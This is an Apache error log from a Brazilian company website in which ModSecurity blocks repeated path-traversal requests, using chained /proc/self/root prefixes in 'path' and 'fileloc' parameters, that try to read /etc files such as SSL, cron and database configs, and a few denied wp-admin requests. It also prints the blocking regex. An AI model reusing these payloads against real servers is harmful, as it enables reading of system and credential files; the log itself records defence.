[Mon Mar 16 16:35:06.470859 2026] [:error] [pid 10831:tid 140411548894976] [client 74.7.241.46:55748] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbaY6lpbStxTqkSkt9QAAAAlc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:35:07.825535 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.241.46:55764] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhba7ysWC90G-1nBrBWMgAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:35:08.971188 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.241.46:34786] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbbI6lpbStxTqkSkt9QgAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:35:10.299451 2026] [:error] [pid 15061:tid 140411658000128] [client 74.7.241.46:34794] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbbqTCbgAP5jq5Teg-pwAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:35:11.511582 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.241.46:34796] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbb7ABkC4fWIHEf8EFwwAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:35:12.828909 2026] [:error] [pid 29507:tid 140411582465792] [client 74.7.243.203:36328] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbcEr9dMAiw-8KANNZCgAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:35:13.767660 2026] [:error] [pid 29802:tid 140411658000128] [client 74.7.241.46:34802] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbcc_BxrYCr4hPDw_9NQAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:35:14.215684 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.243.203:39790] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbctSswJuvopo3lOhxkwAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:35:15.435074 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.243.203:39792] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbc9SswJuvopo3lOhxlQAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:35:16.153037 2026] [:error] [pid 14895:tid 140411649607424] [client 74.7.241.46:34808] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbdFajLEzk2WiQ-10laAAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:35:18.214216 2026] [access_compat:error] [pid 15061:tid 140411599251200] [client 142.248.80.157:62967] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/theme-install.php, referer: https://www.google.com/
[Mon Mar 16 16:35:19.682909 2026] [access_compat:error] [pid 15061:tid 140411658000128] [client 142.248.80.157:62967] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/admin-ajax.php, referer: https://bandeirantesbombas.com.br/wp-admin/plugin-editor.php
[Mon Mar 16 16:35:19.775185 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.241.46:34816] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbd_9ocpUE4ed4uDwEwQAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:35:25.671831 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.243.203:39794] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbfbABkC4fWIHEf8EF0gAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:35:28.107633 2026] [:error] [pid 15061:tid 140411691570944] [client 74.7.243.203:45586] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbgKTCbgAP5jq5Teg-twAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:35:33.819485 2026] [:error] [pid 29802:tid 140411741927168] [client 74.7.243.203:45602] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbhc_BxrYCr4hPDw_9PwAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:35:35.642883 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.243.203:42828] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbh_9ocpUE4ed4uDwExAAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:35:58.925037 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.243.203:42840] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbno6lpbStxTqkSkt9XQAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:35:58.929811 2026] [:error] [pid 14895:tid 140411540502272] [client 74.7.241.46:53074] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbnlajLEzk2WiQ-10loAAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:00.334640 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.243.203:47682] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhboLysWC90G-1nBrBWRQAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:01.620647 2026] [:error] [pid 15568:tid 140411725141760] [client 74.7.243.203:47696] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhboaQpVkWug9HeOt9IVAAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:03.520208 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.241.46:54330] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbo7ysWC90G-1nBrBWSwAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:36:05.080625 2026] [:error] [pid 15568:tid 140411632822016] [client 74.7.243.203:47712] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhbpaQpVkWug9HeOt9IXAAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
